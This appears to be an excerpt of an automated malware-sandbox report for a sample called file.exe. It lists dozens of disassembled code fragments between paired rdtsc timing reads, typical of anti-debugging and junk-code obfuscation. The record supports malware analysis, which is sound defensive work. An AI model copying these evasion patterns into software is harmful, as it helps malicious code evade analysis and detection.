Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D154D second address: 2D1557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4E04B2CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D2506 second address: 2D250C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D2F88 second address: 2D2F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4E04B2CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D4DDB second address: 2D4E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F4E04C4CBF8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F4E04C4CBF8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 00000016h 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d push 00000000h 0x0000003f or dword ptr [ebp+122D3ACDh], eax 0x00000045 cmc 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F4E04C4CBFCh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D5874 second address: 2D5879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D5879 second address: 2D587F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D587F second address: 2D5883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D98C9 second address: 2D9904 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4E04C4CC05h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F4E04C4CC09h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D998D second address: 2D9991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DAABF second address: 2DAACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04C4CBFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DD92E second address: 2DD938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4E04B2CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DD938 second address: 2DD9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx ebx, dx 0x0000000e jmp 00007F4E04C4CC02h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F4E04C4CBF8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f call 00007F4E04C4CC09h 0x00000034 jmp 00007F4E04C4CC07h 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007F4E04C4CBF8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 xor dword ptr [ebp+122D58AEh], esi 0x0000005c add bl, FFFFFFDEh 0x0000005f xchg eax, esi 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F4E04C4CC09h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DDBA2 second address: 2DDC39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F4E04B2CB18h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b adc bh, FFFFFFABh 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F4E04B2CB18h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f movsx edi, di 0x00000052 mov eax, dword ptr [ebp+122D0781h] 0x00000058 mov dword ptr [ebp+122D21A3h], esi 0x0000005e push FFFFFFFFh 0x00000060 jmp 00007F4E04B2CB27h 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F4E04B2CB1Ch 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E0027 second address: 2E007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 sub dword ptr [ebp+122D29F5h], ebx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4E04C4CBF8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a jmp 00007F4E04C4CC08h 0x0000002f push 00000000h 0x00000031 sub dword ptr [ebp+12453852h], edx 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b push eax 0x0000003c pop eax 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DDC39 second address: 2DDC43 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4E04B2CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DDC43 second address: 2DDC5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04C4CC05h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E007C second address: 2E0082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E0082 second address: 2E0086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E01C4 second address: 2E02AC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4E04B2CB27h 0x00000008 jmp 00007F4E04B2CB21h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F4E04B2CB27h 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D2B07h], eax 0x0000001c push dword ptr fs:[00000000h] 0x00000023 jmp 00007F4E04B2CB28h 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F4E04B2CB18h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 jmp 00007F4E04B2CB1Ah 0x0000004e adc ebx, 724A1DBFh 0x00000054 mov eax, dword ptr [ebp+122D1729h] 0x0000005a mov dword ptr [ebp+122D1F43h], ebx 0x00000060 push FFFFFFFFh 0x00000062 push 00000000h 0x00000064 push eax 0x00000065 call 00007F4E04B2CB18h 0x0000006a pop eax 0x0000006b mov dword ptr [esp+04h], eax 0x0000006f add dword ptr [esp+04h], 0000001Dh 0x00000077 inc eax 0x00000078 push eax 0x00000079 ret 0x0000007a pop eax 0x0000007b ret 0x0000007c push eax 0x0000007d pop ebx 0x0000007e nop 0x0000007f jmp 00007F4E04B2CB1Eh 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F4E04B2CB25h 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E2EE3 second address: 2E2EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E1035 second address: 2E1039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E2EE9 second address: 2E2EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E10ED second address: 2E10F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E10F1 second address: 2E10F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E10F7 second address: 2E1101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4E04B2CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E3DD7 second address: 2E3DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E3DDB second address: 2E3DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E3DDF second address: 2E3DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007F4E04C4CBF6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E20CD second address: 2E2102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4E04B2CB25h 0x00000008 jmp 00007F4E04B2CB24h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7DA7 second address: 2E7DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F4E04C4CBFEh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7DC2 second address: 2E7DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7DC8 second address: 2E7DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7E47 second address: 2E7E4D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7E4D second address: 2E7E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E3064 second address: 2E3068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E8D4C second address: 2E8D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E8D53 second address: 2E8DCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4E04B2CB22h 0x0000000f nop 0x00000010 mov edi, esi 0x00000012 call 00007F4E04B2CB23h 0x00000017 mov dword ptr [ebp+122D386Bh], ecx 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 mov di, 2203h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F4E04B2CB18h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D1FA5h], ecx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E8DCA second address: 2E8DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E8DCE second address: 2E8DF2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4E04B2CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4E04B2CB1Fh 0x0000000f popad 0x00000010 push eax 0x00000011 jl 00007F4E04B2CB1Eh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E40FE second address: 2E410C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4E04C4CBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E518B second address: 2E518F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E518F second address: 2E51A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E8F1E second address: 2E8F24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E8F24 second address: 2E8F2E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4E04C4CBFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E8F2E second address: 2E8FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F4E04B2CB18h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov ebx, edi 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F4E04B2CB18h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov di, 3BB4h 0x0000004a sbb bh, FFFFFF9Fh 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov eax, dword ptr [ebp+122D1031h] 0x0000005a mov ebx, dword ptr [ebp+122D3754h] 0x00000060 push FFFFFFFFh 0x00000062 mov ebx, dword ptr [ebp+122D2F45h] 0x00000068 add di, F84Bh 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 jg 00007F4E04B2CB18h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EE90B second address: 2EE90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EE90F second address: 2EE925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EE925 second address: 2EE93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04C4CBFFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29511D second address: 295135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB24h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F2404 second address: 2F240A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F240A second address: 2F2414 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F2414 second address: 2F2418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F5E60 second address: 2F5E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F6011 second address: 2F601B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4E04C4CBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F6143 second address: 2F6147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F6147 second address: 2F614F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FAC82 second address: 2FACA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4E04B2CB26h 0x0000000b popad 0x0000000c jng 00007F4E04B2CB20h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28E3C8 second address: 28E3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28E3CE second address: 28E3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28E3D2 second address: 28E3DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FE661 second address: 2FE685 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4E04B2CB18h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f jne 00007F4E04B2CB16h 0x00000015 pop eax 0x00000016 pop edi 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c jg 00007F4E04B2CB1Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FE715 second address: 2FE728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jbe 00007F4E04C4CBF6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FE728 second address: 2FE740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jl 00007F4E04B2CB16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FE740 second address: 2FE74A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4E04C4CBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FE83E second address: 2FE855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4E04B2CB16h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F4E04B2CB18h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FE855 second address: 2FE86D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnp 00007F4E04C4CBF6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30368E second address: 3036B9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4E04B2CB1Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnc 00007F4E04B2CB16h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4E04B2CB29h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 302C95 second address: 302CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4E04C4CBF6h 0x0000000a popad 0x0000000b pop edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 302CA6 second address: 302CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3030A8 second address: 3030C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a jmp 00007F4E04C4CBFBh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3030C3 second address: 3030C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 303245 second address: 303249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 303249 second address: 30326D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F4E04B2CB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 js 00007F4E04B2CB26h 0x00000019 push ebx 0x0000001a jl 00007F4E04B2CB16h 0x00000020 pop ebx 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 307CB1 second address: 307CC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4E04C4CBFCh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 307E0E second address: 307E18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4E04B2CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 307E18 second address: 307E33 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4E04C4CC03h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 307E33 second address: 307E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
